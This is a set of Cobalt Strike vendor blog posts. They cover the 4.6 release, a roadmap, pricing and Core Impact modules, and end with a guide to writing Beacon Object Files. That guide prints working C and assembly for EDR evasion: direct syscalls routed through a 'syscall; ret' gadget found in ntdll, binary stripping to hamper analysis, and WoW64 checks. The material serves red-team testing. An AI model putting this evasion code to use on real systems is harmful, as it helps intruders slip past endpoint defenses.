Cobalt Strike Blog | Cobalt Strike Research and Development

Cobalt Strike 4.6: The Line In The Sand

Cobalt Strike 4.6 is now available. As I mentioned in the recent Roadmap Update blog post, this isn’t a regular release, as it mostly focuses on security updates. There are also a couple of useful updates for users. A major release is planned for this summer, so this release lays the groundwork for the changes that are coming at that point.

Execute-assembly 1MB Limit Increase

A number of users have been asking for this for quite some time, and the change that we made affects not only execute-assembly but other tasks (e.g. dllinject) as well. We have added three new settings to the Malleable C2 profile (tasks_max_size, tasks_proxy_max_size and tasks_dns_proxy_max_size) that can be used to control maximum size limits. Note that these settings need to be set prior to team server startup. If the size is increased at a later time, old artifacts will still use the previous size settings and tasks that are too large will be rejected.

Comprehensive information on the new settings can be found in the Cobalt Strike documentation.

Arsenal Kit

We have combined the individual kits in the Cobalt Strike arsenal into a single kit, appropriately known as the Arsenal Kit. Building this kit yields a single aggressor script that can be loaded instead of loading all of the separate kits individually. The kit is controlled by the arsenal_kit_config file which is used to configure the kits that are built with the build_arsenal_kit.sh script.

The Arsenal Kit can be downloaded by licensed users from the Cobalt Strike arsenal.

Security Updates

This is the main focus of the Cobalt Strike 4.6 release. It is a necessary step as it lays the groundwork for our future development efforts.

Product security is nothing new. There has always been anti-proliferation processing in the software and, as discussed in this blog post (published by Raphael Mudge in 2019), we do our due diligence when it comes to screening potential customers and working with law enforcement. I think it is worth pointing out that the processes described by Raphael in that blog post are still processes that are followed at HelpSystems today–specifically:

From time to time, we receive informal requests for technical assistance or records from private entities. Our policy is not to perform analysis for, provide deconfliction services to, or disclose our records to private entities upon informal request.

If we have information relevant to a law enforcement investigation, we comply with valid legal process.

This stance is to avoid frivolous requests and to protect our customers’ information.

We also investigate tips. We can’t usually share information back, but we look into things brought to our attention.

We are also proactive when it comes to searching for Cobalt Strike teamservers out in the wild. This work is carried out by our own, dedicated threat intelligence team and it helps us to improve our product controls. That team also issues takedown requests if cracked copies are found.

Over the past few releases, we have made enhancements to Cobalt Strike’s product security. We intentionally haven’t described product security changes in much detail, but we do take it very seriously. Product security has been and will continue to be a key feature on our roadmap.

The 4.5 release in December 2021 saw changes to product licensing and improvements on the watermarking in the software. Those changes made it significantly more difficult to tamper with the authorization ID and locate the ever-changing hidden watermarks, therefore making it easier for us to trace stolen copies of Cobalt Strike back to specific customers. We have yet to see any credible reports of cracked copies of the 4.5 release being used because of these changes. We have seen what are claimed to be cracked copies of 4.5 being sold, but those have all turned out to be older versions badged as 4.5. By design, if the watermarks in the 4.5 release are tampered with, it will simply no longer work.

The 4.6 release brings a change to how the teamserver is deployed. Rather than a Java .jar archive, the teamserver has been built as a native binary. The client is still shipped as a .jar archive, but we plan to change that as well at some point. You shouldn’t notice anything different about the update process itself, but it is important to note that “cobaltstrike.jar” is now just a container for the team server (“TeamServerImage”) and client (“cobaltstrike-client.jar”), both of which will automatically be extracted during the update process. One thing to bear in mind is that Cobalt Strike 4.6 is installed and run differently, and the download infrastructure has changed to support this, so any scripts that you use to automate the update process will likely no longer work and will need to be changed.

What does this mean? For you, moving forward, there is no real change. You can still download, update and use Cobalt Strike in the same way–however, please be aware that in this instance, you will need to download 4.6 directly from the website as the version 4.5 updater is incompatible with this release and will not recognize that an update is available. For us, building the software in this way is another step forward in terms of product security.

This is a line in the sand for us. We needed to make these necessary security enhancements so that we can forge ahead with our new development strategy and deliver more of what matters to our users. Normal service will be resumed with the 4.7 release this summer. Cobalt Strike will be 10 years old then so we’re hoping to do that release justice to mark the occasion properly.

To see a full list of what’s new in Cobalt Strike 4.6, please check out the release notes. Licensed users can download version 4.6 from the website. To purchase Cobalt Strike or learn more, please contact us.

Building Upon a Strong Foundation

In the weeks ahead, Cobalt Strike 4.6 will go live and will be a minor foundational release before we move into our new development model. This release will be less about features and is more focused on bolstering security even further. This is all in preparation for a much bigger release later, which will also serve as a celebration of Cobalt Strike’s 10th birthday. As we approach this 10-year anniversary, we’ve also taken the time to reflect on the incredible journey of this product.

Raphael Mudge created and developed Cobalt Strike for many years, entirely on his own. With the acquisition by HelpSystems more than two years ago, additional support came along to bring about some great new features, including the reconnect button, new Aggressor Script hooks, the Sleep Mask Kit, and the User Defined Reflective Loader (UDRL).

Now, with Raphael’s vision always in mind, we have a growing team focused on supporting this solution to bring more stability and flexibility. We’re also dedicating additional resources to research activities, with the goal of creating and releasing new tools into the Community Kit and the Cobalt Strike arsenal. Additionally, we are placing a great deal of emphasis on the security of the product itself in order to prevent misuse by malicious, non-licensed users.

With this increased investment comes additional costs and a pricing change. In appreciation for current Cobalt Strike users and their support of the solution, the change will not affect existing customers. The price of Cobalt Strike for new customers will be $5,900 per user for a one-year license.

The bundle pricing for Cobalt Strike and Core Impact will remain the same so you can pair any version of Core Impact—basic, pro, or enterprise—with Cobalt Strike at a reduced cost. Cobalt Strike’s interoperability with Core Impact highlights another one of the advantages of being part of a company with an ever-growing list of cybersecurity offerings. Developers of these products work together to help organizations create a cohesive security strategy that provides full coverage of their environments.

As we continue to evolve with the threat landscape and strengthen Cobalt Strike accordingly, a permanent fixture in our strategy will always be to listen to our customers. Many aspects of our updates are a direct result of customer feedback, so we encourage you to keep being vocal about the features that you most want to see. 

Cobalt Strike Roadmap Update

Historically, Raphael Mudge, the creator of Cobalt Strike, didn’t typically talk about the Cobalt Strike roadmap publicly. He preferred to play his cards close to his chest and only revealed the details about each release when it went live (and he didn’t give much warning about the release date, either). That was his way of building excitement for each release. For the most part we’ve continued that tradition, but I’d like to spend a little time being a bit more transparent about our future development plans, before dropping back into the shadows.

I spent about a year working closely with Raphael after HelpSystems acquired Strategic Cyber, amongst other things being educated on what makes Cobalt Strike so special. One of the many things that he instilled in me is that the fundamental principles of Cobalt Strike are stability and flexibility. He was excited to see a team of experienced, professional software engineers being built around the product to provide the stability and we’ve continued to add flexibility over the past few releases – for example, with the recent sleep mask kit and user defined reflective loader kit. That’s our mantra: Stability and Flexibility.

Raphael also cautioned against adding cutting edge, out of the box evasion techniques to Cobalt Strike. The obvious danger is that once they’re inevitably fingerprinted, we’d get stuck in an endless loop of fixing those issues rather than working on new features. Cobalt Strike’s defaults are easily fingerprinted and that’s by design. The idea is that you bring your own tools and techniques to Cobalt Strike and use those. That’s what makes it unique.

We spend a lot of time engaging with our user community on social media, Slack and Discord, sometimes engaging directly in those threads and sometimes via DM, email or on video calls. I love that aspect of my role. It’s great to get the opportunity to interact directly with people that are using Cobalt Strike and see first-hand what’s working and what isn’t.

We’ve had a lot of feedback recently that some users just don’t have the time to work on their own tools because they’re so busy on engagements. We created the Cobalt Strike Community Kit to act as a central repository of extensions written by our users to make it easier to find useful tools but obviously there are cases where specific tools just don’t exist and you don’t have time to write them yourselves. We don’t want to abandon our core philosophy and start adding out of the box evasion to the core product, but we are making some changes.

Firstly, we are expanding the development team to provide additional capacity. Secondly, and more importantly, we are changing our development cycle so that we can give you your cake AND let you eat it.

Up until now, we have aimed to get at least three releases out per year. We are moving to a model where we will release updates to core Cobalt Strike (Stability and Flexibility) twice per year. One release will be in the Summer, and another in the Winter. You’re confused. I can sense it. “How does reducing the number of releases help?” Well, the second part of the new release schedule is to ramp up research activities and start releasing more tools outside the regular release schedule. What does this mean? The plan is that essentially, in between those core releases (which should contain more features due to the extended development time between them), we’ll be releasing a steady stream of tools into the Community Kit and/or into the Cobalt Strike arsenal. The location of each tool pretty much depends on the type of tool being released and whether we’re releasing the source as well.

There is a caveat to this, though. There is a little short-term pain while we pivot to this new release model. There will be a small, intermediate Cobalt Strike release this Spring (late March or early April) that doesn’t really have a lot of flashy new features for you, our users, but sets the foundation for future releases. We have a much bigger release planned that should ship around July/August to mark Cobalt Strike’s 10-year anniversary.

The future is bright. HelpSystems continues to invest in Cobalt Strike and expand the team around it. We will continue to listen to our users and give you the product and features that you need.

Feature requests can be submitted to [email protected] and I’m always happy to talk to users on social media, Slack and Discord.

Joe’s Transition

My career is taking me in a new and exciting direction, and I am stepping down from my role on the Cobalt Strike team.

I’ve spent the last year helping HelpSystems integrate Cobalt Strike into their processes and shift from a single developer to a team effort. I can honestly say that “Cobalt Strike is in great hands.”

I’ve seen tremendous growth and support from the Cobalt Strike community in the last 12 months. Thank you all for the generous support and outstanding research. Keep pushing forward. 

The team’s mantra will continue to focus on product stability and flexibility to the product’s attack chain. I’ve helped pack the roadmap with great features, many of which came directly from community requests.

I’ve been a user of Cobalt Strike for almost ten years now, and it has been an honor to be part of this team. I wish the team good luck and look forward to seeing their influence on professional security testing. 

I may be moving on, but I will continue to be part of the security community. My career has been filled with great opportunities and great people. I am very thankful for the generous support shown by our community.

Make sure to follow @CoreAdvisories for Cobalt Strike-related Twitter announcements.

Incorporating New Tools into Core Impact

Core Impact has further enhanced the pen testing process with the introduction of two new modules. The first module enables the use of .NET assemblies, while the second module provides the ability to use BloodHound, a data analysis tool that uncovers hidden relationships within an Active Directory (AD) environment. In this blog, we’ll dive into how Core Impact users can put these new modules into action during their engagements.

In-memory .NET Assembly Execution

With the Core Impact “.NET Assembly Execution” module you can now include .NET assemblies in your engagements. This module accepts a path to a local executable assembly and runs it on a given target. You may pass arbitrary arguments, quoted or not, to this program as if you ran it from a command shell. It can be executed in a sacrificial process using the fork and run technique or inline in the agent process.

Sharing Resources: Core Impact and Cobalt Strike

Cobalt Strike, our adversary simulation tool that focuses on post-exploitation, also uses .NET assembly tools. The “.NET Assembly Execution” module is compatible with extensions commonly employed by Cobalt Strike users, providing an opportunity to broaden the reach of Core Impact. Any executions that employ the execute-assembly command in Cobalt Strike can be used as a shared resource when using both products for a testing engagement.

Some modules used by Cobalt Strike that can now be used within Core Impact include:

AD Data Collection using BloodHound

Another module, “Get AD data with SharpHound (BloodHound Collector),” is based on the same technology as the first. It was developed to enable the usage of BloodHound during an Active Directory attack to facilitate the reconnaissance steps. BloodHound works by analyzing data about AD collected from domain controllers and domain-joined Windows systems, quickly detecting complex attack paths for lateral movement, privilege escalation, and more. Users can now incorporate these capabilities into their engagements to help identify these attack paths before threat actors do.

Expand Your Security Tests Even Further

With the introduction of these modules, Core Impact continues to help unify security. In addition to these modules, Core Impact integrates with other security tools, including multiple vulnerability scanners, PowerShell Empire, Plextrac, and more. Core Impact is particularly aligned with Cobalt Strike, with interoperability features like session passing as well as the new “.NET Assembly Execution” module.

Successful security testing involves both talented cybersecurity professionals and the right portfolio of tools. Solutions that work with one another can help to maximize resources, reduce console fatigue, and standardize reporting. Tools like Core Impact can help serve as a point of centralization, helping organizations to advance their vulnerability management programs without overcomplicating strategies.

Cobalt Strike Training Options

The Cobalt Strike training web page has been updated. https://www.cobaltstrike.com/training/

The training web page lists free courses created by the Cobalt Strike team that provide an overview of the product. It also lists courses offered by trusted 3rd parties. The 3rd party courses use Cobalt Strike to some degree and can be a great way to practice and learn how Cobalt Strike can be used in a realistic environment.

The page will be updated as new courses are added.

Writing Beacon Object Files: Flexible, Stealthy, and Compatible

Our colleagues over at Core Security have been doing great things with Cobalt Strike, making use of it in their own engagements. They wrote up this post on creating Cobalt Strike Beacon Object Files using the MinGW compiler on Linux. It covers several ideas and best practices that will increase the quality of your BOFs.

Flexibility

Compiling to Both Object Files and Executables

While writing a BOF is great, it’s always worth making the code compile to both BOF and EXE.

This provides a lot more options: we could run our capability outside Beacon by just writing the EXE to disk and executing it. We could then convert it into position independent shellcode using donut and run it from memory.

Usually, calling a Windows API from a Beacon Object File would appear as follows:

program.h

WINBASEAPI size_t __cdecl MSVCRT$strnlen(const char *s, size_t maxlen);

program.c

int length = MSVCRT$strnlen(someString, 256);
BeaconPrintf(CALLBACK_OUTPUT, "The variable length is %d.", length);

Makefile

BOFNAME := program
CC_x64 := x86_64-w64-mingw32-gcc
all:
    $(CC_x64) -c source/program.c -o compiled/$(BOFNAME).x64.o -masm=intel -Wall

However, we would like to create both a BOF and an EXE from the same source file. A practical way to achieve this is to add a conditional compilation clause, as shown below. In this example, the macro is named BOF and is defined with -DBOF only when building the object file:

Makefile

BOFNAME := program
CC_x64 := x86_64-w64-mingw32-gcc
all:
    $(CC_x64) -c source/program.c -o compiled/$(BOFNAME).x64.o   -masm=intel -Wall -DBOF
    $(CC_x64)    source/program.c -o compiled/$(BOFNAME).x64.exe -masm=intel -Wall

program.h

#ifdef BOF
WINBASEAPI size_t __cdecl MSVCRT$strnlen(const char *s, size_t maxlen);
#define strnlen MSVCRT$strnlen
#endif
#ifdef BOF
#define PRINT(...) { \
     BeaconPrintf(CALLBACK_OUTPUT, __VA_ARGS__); \
}
#else
#define PRINT(...) { \
     fprintf(stdout, __VA_ARGS__); \
     fprintf(stdout, "\n"); \
}
#endif

program.c

int length = strnlen(someString, 256);
PRINT("The variable length is %d.", length);

Finally, in our program.c file, we would define the “go” (BOF’s entry point) and “main” functions:

program.c

#ifdef BOF
void go(char* args, int length)
{
     // BOF code
}
#else
int main(int argc, char* argv[])
{
    // EXE code
}
#endif

Stealth

Syswhispers2 Integration

syswhispers2 is an awesome implementation of direct syscalls. However, if we take a look under the hood, we can see that it uses a global variable to achieve its objective. Unfortunately, global variables do not work very well with Beacon. This is because Beacon Object Files don’t have a .bss section, which is where global variables are typically stored.

A useful trick, originally suggested by Twitter user @the_bit_diddler, is to move the global variables to the .data section using a compiler directive, as shown below:

syscalls.c (before)

SW2_SYSCALL_LIST SW2_SyscallList;

syscalls.c (after)

SW2_SYSCALL_LIST SW2_SyscallList __attribute__ ((section(".data")));

This small change will allow the use of the syswhispers2 logic in a BOF.
In addition to the global variables change, there are other minor changes that need to be made so that the code of syswhispers2 can compile with MinGW. For example, the format of the API hashes needs to be changed from 0ABCD1234h to 0xABCD1234. The tool InlineWhispers should take care of the rest.
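To make the literal format change concrete, here is a minimal sketch of a converter from the MASM-style form to the GNU-style form. The helper name masm_hex_to_gnu is hypothetical and is not part of syswhispers2 or InlineWhispers; it only illustrates the textual difference between the two notations for 32-bit values.

```c
#include <stdio.h>
#include <stdlib.h>

/* Rewrite a MASM-style 32-bit hex literal ("0ABCD1234h") in GNU-style form
 * ("0xABCD1234"). Hypothetical helper for illustration only.
 * Returns 0 on success, -1 if the input does not look like "<hex digits>h",
 * does not fit in 32 bits, or the output buffer is too small. */
int masm_hex_to_gnu(const char *masm, char *out, size_t out_len)
{
    char *end;
    /* strtoul stops at the first non-hex character, i.e. the 'h' suffix. */
    unsigned long value = strtoul(masm, &end, 16);

    if (end == masm || (*end != 'h' && *end != 'H') || end[1] != '\0')
        return -1;
    if (value > 0xFFFFFFFFul)
        return -1;

    int written = snprintf(out, out_len, "0x%08lX", value);
    return (written > 0 && (size_t)written < out_len) ? 0 : -1;
}
```

Called with "0ABCD1234h" and a 16-byte buffer, the function writes "0xABCD1234"; the leading 0 that MASM requires before a letter digit is absorbed by the numeric parse.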

Using direct syscalls is a powerful technique to avoid userland hooks. Ironically, using them could get us caught.

There are at least two ways of detecting direct syscalls: dynamic and static.
The dynamic method is simply detecting that a syscall was called from a module that is not ntdll.dll. The static method is to find a syscall instruction by inspecting the program’s code and memory. How can we avoid both these detections? The answer is to call our syscalls from ntdll.dll.

First, we must locate where ntdll.dll is loaded. Luckily, syswhispers2 already has the code to do just that. Then, we can parse its headers and locate the code section.

Hiding the Use of syscalls

Once we know the base address and size of the code section of ntdll.dll, all we need to do is search for the opcodes of the instructions syscall; ret. In x64, the bytes we are looking for are: { 0x0f, 0x05, 0xc3 }.

While it is true that EDRs and other tools hook (overwrite) syscalls in ntdll.dll, they certainly do not hook all existing syscalls, so we are guaranteed to find at least one occurrence of these three bytes. We might even find them by chance in a misaligned offset.
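The search itself is a plain byte-pattern scan. The following is a portable sketch of that idea, separate from the BOF code: find_bytes is a hypothetical helper name, and it uses memcmp from the C library rather than anything Beacon-specific. The loop bound is chosen so that every comparison stays inside the buffer.

```c
#include <stddef.h>
#include <string.h>

/* Return a pointer to the first occurrence of pat inside buf, or NULL if it
 * does not occur. Hypothetical helper for illustration only. The last
 * candidate offset is buf_len - pat_len, so memcmp never reads past the end
 * of the buffer. */
const unsigned char *find_bytes(const unsigned char *buf, size_t buf_len,
                                const unsigned char *pat, size_t pat_len)
{
    if (pat_len == 0 || buf_len < pat_len)
        return NULL;

    for (size_t i = 0; i <= buf_len - pat_len; i++) {
        if (memcmp(buf + i, pat, pat_len) == 0)
            return buf + i;
    }
    return NULL;
}
```

As an example of a misaligned hit, the bytes 90 b8 0f 05 c3 00 encode a nop followed by mov eax, 0x00c3050f. Scanning them for { 0x0f, 0x05, 0xc3 } returns offset 2, which lies inside the immediate operand rather than at a real syscall instruction, yet it is still a usable syscall; ret sequence when jumped to.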

Once we find the syscall; ret bytes, we can save the address in a global variable (stored in the .data section). That way, we only need to find it once.

Everything we have just described can be seen in the following code sequence:

syscalls.c

#ifdef _WIN64
#define PEB_OFFSET 0x60
#define READ_MEMLOC __readgsqword
#else
#define PEB_OFFSET 0x30
#define READ_MEMLOC __readfsdword
#endif

PVOID SyscallAddress __attribute__ ((section(".data"))) = NULL;
 
__attribute__((naked)) void SyscallNotFound(void)
{
    __asm__(" SyscallNotFound: \n\
        mov eax, 0xC0000225 \n\
        ret \n\
    ");
}

PVOID GetSyscallAddress(void)
{
#ifdef _WIN64
    BYTE syscall_code[] = { 0x0f, 0x05, 0xc3 };
#else
    BYTE syscall_code[] = { 0x0f, 0x34, 0xc3 };
#endif

    // Return early if the SyscallAddress is already defined
    if (SyscallAddress)
    {
        // make sure the instructions have not been replaced
        if (!strncmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))
            return SyscallAddress;
    }
  
    // set the fallback as the default
    SyscallAddress = (PVOID) SyscallNotFound;
 
    // find the address of NTDLL
    PSW2_PEB Peb = (PSW2_PEB)READ_MEMLOC(PEB_OFFSET);
    PSW2_PEB_LDR_DATA Ldr = Peb->Ldr;
    PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
    PVOID DllBase = NULL;
    PVOID BaseOfCode = NULL;
    ULONG32 SizeOfCode = 0;
 
    // Get the DllBase address of NTDLL.dll. NTDLL is not guaranteed to be the second
    // in the list, so it's safer to loop through the full list and find it.
    PSW2_LDR_DATA_TABLE_ENTRY LdrEntry;
    for (LdrEntry = (PSW2_LDR_DATA_TABLE_ENTRY)Ldr->Reserved2[1]; LdrEntry->DllBase != NULL; LdrEntry = (PSW2_LDR_DATA_TABLE_ENTRY)LdrEntry->Reserved1[0])
    {
        DllBase = LdrEntry->DllBase;
        PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)DllBase;
        PIMAGE_NT_HEADERS NtHeaders = SW2_RVA2VA(PIMAGE_NT_HEADERS, DllBase, DosHeader->e_lfanew);
        PIMAGE_DATA_DIRECTORY DataDirectory = (PIMAGE_DATA_DIRECTORY)NtHeaders->OptionalHeader.DataDirectory;
        DWORD VirtualAddress = DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        if (VirtualAddress == 0) continue;
 
        ExportDirectory = SW2_RVA2VA(PIMAGE_EXPORT_DIRECTORY, DllBase, VirtualAddress);
 
        // If this is NTDLL.dll, exit loop.
        PCHAR DllName = SW2_RVA2VA(PCHAR, DllBase, ExportDirectory->Name);
        if ((*(ULONG*)DllName | 0x20202020) != 0x6c64746e) continue;
        if ((*(ULONG*)(DllName + 4) | 0x20202020) == 0x6c642e6c)
        {
            BaseOfCode = SW2_RVA2VA(PVOID, DllBase, NtHeaders->OptionalHeader.BaseOfCode);
            SizeOfCode = NtHeaders->OptionalHeader.SizeOfCode;
            break;
        }
    }
    if (!BaseOfCode || !SizeOfCode)
        return SyscallAddress;
 
    // try to find a 'syscall' instruction inside of NTDLL's code section
  
    PVOID CurrentAddress = BaseOfCode;
    // last address at which a full match still fits inside the code section
    PVOID EndOfCode = SW2_RVA2VA(PVOID, BaseOfCode, SizeOfCode - sizeof(syscall_code));
    while ((ULONG_PTR)CurrentAddress <= (ULONG_PTR)EndOfCode)
    {
        if (!strncmp((PVOID)syscall_code, CurrentAddress, sizeof(syscall_code)))
        {
            // found 'syscall' instruction in ntdll
            SyscallAddress = CurrentAddress;
            return SyscallAddress;
        }
        // increase the current address by one
        CurrentAddress = SW2_RVA2VA(PVOID, CurrentAddress, 1);
    }
    // syscall entry not found, using fallback
    return SyscallAddress;
}

syscalls.h

EXTERN_C PVOID GetSyscallAddress(void);

In the extremely unlikely scenario in which we do not find ANY occurrence of these three bytes in the code section of ntdll.dll, we can instead use our own function: SyscallNotFound. This simply returns STATUS_NOT_FOUND. We could implement a syscall; ret, but keep in mind that we want to avoid having the syscall instruction in our code in order to evade static analysis.
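The two magic constants used to recognise ntdll.dll in GetSyscallAddress may look opaque. The sketch below reproduces the same comparison in portable C to show where they come from. The function name looks_like_ntdll is hypothetical, and the code assumes a little-endian host, as is the case on x86 and x64.

```c
#include <stdint.h>
#include <string.h>

/* Case-insensitive check that a name starts with "ntdll.dl", four bytes at a
 * time. OR-ing with 0x20202020 sets bit 5 of every byte, which lowercases
 * ASCII letters; '.' (0x2e) already has that bit set and is unchanged.
 * Hypothetical helper for illustration; assumes a little-endian host. */
int looks_like_ntdll(const char *name)
{
    uint32_t first, second;

    if (strlen(name) < 8)
        return 0;

    memcpy(&first, name, 4);       /* bytes 0..3 */
    memcpy(&second, name + 4, 4);  /* bytes 4..7 */

    return (first  | 0x20202020u) == 0x6c64746eu   /* "ntdl" read as a 32-bit value */
        && (second | 0x20202020u) == 0x6c642e6cu;  /* "l.dl" read as a 32-bit value */
}
```

Both "ntdll.dll" and "NTDLL.DLL" pass the check, while "kernel32.dll" does not. Because the OR also maps a few non-letter bytes onto the same values, this is a cheap filter rather than a strict string comparison.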

Once we have the memory address of interest, all we need to do is to modify the assembly of our syscall functions to jump to this memory address:

push rcx ; save volatile registers
push rdx
push r8
push r9
sub rsp, 0x28 ; allocate some space on the stack
call GetSyscallAddress ; call the C function and get the address of the 'syscall' instruction in ntdll.dll
add rsp, 0x28
push rax ; save the address in the stack
sub rsp, 0x28 ; allocate some space on the stack
mov ecx, 0x0123ABCD ; set the syscall hash as the parameter
call SW2_GetSyscallNumber ; get the id of the syscall using syswhispers2
add rsp, 0x28
pop r11 ; store the address of the 'syscall' instruction on r11
pop r9 ; restore the volatile registers
pop r8
pop rdx
pop rcx
mov r10, rcx
jmp r11 ; jump to ntdll.dll and call the syscall from there

And voilà, we use direct syscalls from a valid module (ntdll.dll) without having a syscall instruction in our code 😊.

Stripping the Debug Symbols

While this step is not critical, stripping your binaries is well worth the extra effort. Once stripped, they are not only a lot harder to analyze but also smaller.

All we need to do is modify the Makefile to look as follows:

BOFNAME := program
CC_x64 := x86_64-w64-mingw32-gcc
STRIP_x64 := x86_64-w64-mingw32-strip
 
all:
    $(CC_x64) -c program.c -o compiled/$(BOFNAME).x64.o   -masm=intel -Wall -DBOF
    $(STRIP_x64) --strip-unneeded compiled/$(BOFNAME).x64.o
 
    $(CC_x64)    program.c -o compiled/$(BOFNAME).x64.exe -masm=intel -Wall
    $(STRIP_x64) --strip-all compiled/$(BOFNAME).x64.exe

While the EXE does end up being smaller, stripping the BOF doesn’t reduce its size significantly (only around 500 bytes).

Once the debugging symbols are stripped, compiling the unmodified code produces the same object file and executable regardless of who compiles it, so everyone ends up with identical binaries.


Is that a bad thing? Potentially, but only if fingerprinting is a concern. The code could be slightly modified and recompiled. For example, the seed of syswhispers2 could be changed. If code is run from a Beacon or in memory in the form of shellcode, fingerprinting should not be worrisome, as static analysis in those cases is not possible.
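To see why changing a seed is enough to alter the compiled output, consider the sketch below. It is a simplified stand-in and not syswhispers2's actual hashing routine; the names ror8 and seeded_hash are hypothetical. The point is only that every hash constant embedded in the syscall stubs depends on the seed, so a new seed yields different bytes in the binary.

```c
#include <stdint.h>

/* Rotate a 32-bit value right by 8 bits. */
static uint32_t ror8(uint32_t v)
{
    return (v >> 8) | (v << 24);
}

/* Illustrative seeded hash of a function name. This is NOT the routine used
 * by syswhispers2; it is a simplified stand-in. Each step (rotate, then XOR
 * with a byte) is reversible, so for a fixed name two different seeds always
 * produce two different hashes. */
uint32_t seeded_hash(const char *name, uint32_t seed)
{
    uint32_t hash = seed;

    for (; *name != '\0'; name++)
        hash = ror8(hash) ^ (unsigned char)*name;

    return hash;
}
```

Hashing the same name, for instance "NtClose", with two different seeds gives two different constants, which is the property that makes a reseeded build differ from the published one.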

Compatibility

Supporting x86 might seem hard and pointless, but we shouldn’t limit ourselves and leave every 32-bit machine out of our reach. Supporting x86 is a fun challenge and pays off in the end.

Code Logic

We’ll begin by introducing some conditional compilation clauses based on the architecture:

#if _WIN64
// x64 version of some logic
#else
// x86 version of some logic
#endif

If we want to add some code that is exclusive to x64:

#if _WIN64
// some code only for x64
#endif

If we want to add some code that is exclusive to x86:

#ifndef _WIN64
// some code only for x86
#endif

X86 syscall Support

To support syscalls in x86, we will have to deal with a few difficulties that are very manageable.

Function Names Within x86 Assembly

The main issue we encounter when trying to call the C functions SW2_GetSyscallNumber and GetSyscallAddress from x86 inline assembly is a pair of linker errors:

/usr/lib/gcc/i686-w64-mingw32/11.2.0/../../../../i686-w64-mingw32/bin/ld: /tmp/ccbjuGDN.o:program.c:(.text+0x68): undefined reference to `GetSyscallAddress'

/usr/lib/gcc/i686-w64-mingw32/11.2.0/../../../../i686-w64-mingw32/bin/ld: /tmp/ccbjuGDN.o:program.c:(.text+0x73): undefined reference to `SW2_GetSyscallNumber'

There is some GCC documentation which explains that, for some reason, in x86 inline assembly the names of C functions (and variables) are prefixed with an underscore. So, in this case, GetSyscallAddress becomes _GetSyscallAddress and SW2_GetSyscallNumber becomes _SW2_GetSyscallNumber.

Instead of calling them with the underscore, we can just adapt their definition to specify their name in assembly, like this:

syscalls.h

EXTERN_C DWORD SW2_GetSyscallNumber(DWORD FunctionHash) asm ("SW2_GetSyscallNumber");
EXTERN_C PVOID GetSyscallAddress(void) asm ("GetSyscallAddress");

We also need to do the same with the definitions for all the syscalls in syscalls.h. For example, here’s how we can modify NtOpenProcess:

syscalls.h (before)

EXTERN_C NTSTATUS NtOpenProcess(
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL);

syscalls.h (after)

EXTERN_C NTSTATUS NtOpenProcess(
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL) asm ("NtOpenProcess");

Once this is done, the weird x86 naming system should work fine.

Syscalls With Conflicting Types

There are some syscalls that fail to compile in x86, and produce an error message like:

error: conflicting types for ‘NtClose’;

While there are surely others, these syscalls are confirmed to have this issue:

  • NtClose
  • NtQueryInformationProcess
  • NtCreateFile
  • NtQuerySystemInformation
  • NtQueryObject

It appears that in x86, MinGW already has a definition of these functions somewhere. To fix this, we just need to rename the troubling syscalls by prepending an underscore to their name in the x86 version.

program.h

In program.c, we can call these functions normally, without prepending the underscore to their name.
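One way to express this rename in program.h is sketched here, under the assumption that a preprocessor macro is used for it. The stand-in typedefs and the stub body are hypothetical and exist only so the fragment compiles on its own; real code would take the types from the Windows headers and the body from the syscall assembly.

```c
/* Stand-in types (assumption): real code gets these from windows.h. */
typedef long NTSTATUS;
typedef void *HANDLE;

#ifndef _WIN64
/* x86 only: map the public name to an underscore-prefixed one so that our
 * declaration no longer clashes with the one the toolchain already has.
 * Callers keep writing NtClose(...). */
#define NtClose _NtClose
#endif

/* Declares _NtClose on x86 and NtClose on x64. */
NTSTATUS NtClose(HANDLE Handle);

/* Hypothetical stub body standing in for the real syscall stub. */
NTSTATUS NtClose(HANDLE Handle)
{
    (void)Handle;
    return 0;
}
```

With this in place, a call such as NtClose(handle) in program.c is rewritten by the preprocessor to _NtClose(handle) on x86 and left untouched on x64. The same pattern would be repeated for each of the conflicting syscalls listed above.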

X86 Assembly Code

For the assembly code, we’ll need to update syscalls-asm.h to look as follows:

syscalls-asm.h

Finally, the x86 assembly will look like this:

After all these changes, we have syscalls x86 support.

WoW64 Support?

WoW64 stands for Windows on Windows64, the subsystem that lets 32-bit programs run on 64-bit Windows machines. In WoW64 processes, syscalls are not called via a syscall or sysenter instruction. Instead, a jump to fs:[0xc0] is performed. Understanding the way this works requires a long explanation, but for the purpose of this article, all we need to know is that it translates syscalls from 32 to 64-bit so that the kernel can understand them.

One quick way of “supporting” syscalls on WoW64 processes is to perform the same jump from our code. However, there are a few drawbacks when doing this. First, this is by no means a direct syscall, so EDRs can hook these calls. Additionally, for syscalls that take pointers, we will not be able to reference addresses beyond the 32-bit range.

Truly supporting direct syscalls for WoW64 processes would require us to transition via a far jmp instruction into 64-bit code, translate the parameters to their 64-bit counterparts, adjust the calling convention, set the stack alignment and more. These actions alone could make up an entire post.

That being said, jumping to fs:[0xc0] is an easy trick and at least we would have some support for WoW64, which might be useful for some scenarios.

To detect if our program is running as a WoW64 process, we’ll define a function called IsWoW64:

syscalls-asm.h

#if _WIN64
#define IsWoW64 IsWoW64
__asm__("IsWoW64: \n\
mov rax, 0 \n\
ret \n\
");
#else
#define IsWoW64 IsWoW64
__asm__("IsWoW64: \n\
mov eax, fs:[0xc0] \n\
test eax, eax \n\
jne wow64 \n\
mov eax, 0 \n\
ret \n\
wow64: \n\
mov eax, 1 \n\
ret \n\
");
#endif

syscalls.h

EXTERN_C BOOL IsWoW64(void) asm ("IsWoW64");

program.c

    if(IsWoW64())
    {
        PRINT("This is a 32-bit process running on a 64-bit machine!\n");
    }

If detection is a concern when running under a WoW64 context, just call IsWoW64() and bail out if it returns true.
This can also be checked in the .cna file in Cobalt Strike:

program.cna

$barch = barch($1);
$is64 = binfo($1, "is64");
if($barch eq "x86" && $is64 == 1)
{
    berror($1, "This program does not support WoW64");
    return;
}

